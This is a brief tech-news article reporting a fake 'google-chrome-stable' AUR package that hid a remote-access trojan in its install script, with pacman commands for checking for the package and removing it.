The Arch User Repository (AUR) is a popular resource for Arch Linux users. It hosts user-submitted build scripts for software not included in the official repositories. While its openness provides flexibility, it also introduces vulnerabilities.
Merely a few weeks ago, AUR was hit by a RAT that disguised itself inside browser-related packages. It infected systems during the install process using a malicious GitHub link embedded in the PKGBUILD script.
Now, a similar case has emerged, where a new package pretending to be Google Chrome has been caught carrying another hidden RAT script.
What's Happening: A file named google-chrome-stable had made its way into the AUR, uploaded by a newly created user account called "forsenontop", who had no other activity other than this.
According to Linuxiac, the package used an .install script to run a Python command that downloaded and executed remote code each time the Chrome browser was launched. The code runs silently in the background, with no visible signs to the user.
Luckily, the package was quickly removed by AUR admins once it was reported by a user.
What Now: Like earlier, if you suspect that you might be affected, then you can first run the following command to see whether the malicious package is on your system:
pacman -Qs google-chrome-stableIf this package shows up in your system, then remove it immediately with:
sudo pacman -Rns google-chrome-stableUpdated on August 4, 2025, at 05:10 UTC.
And I will say this again: always make sure your system is up to date and only install packages from trusted sources.
Via: Linuxiac
Suggested Read 📖
Sourav Rudra
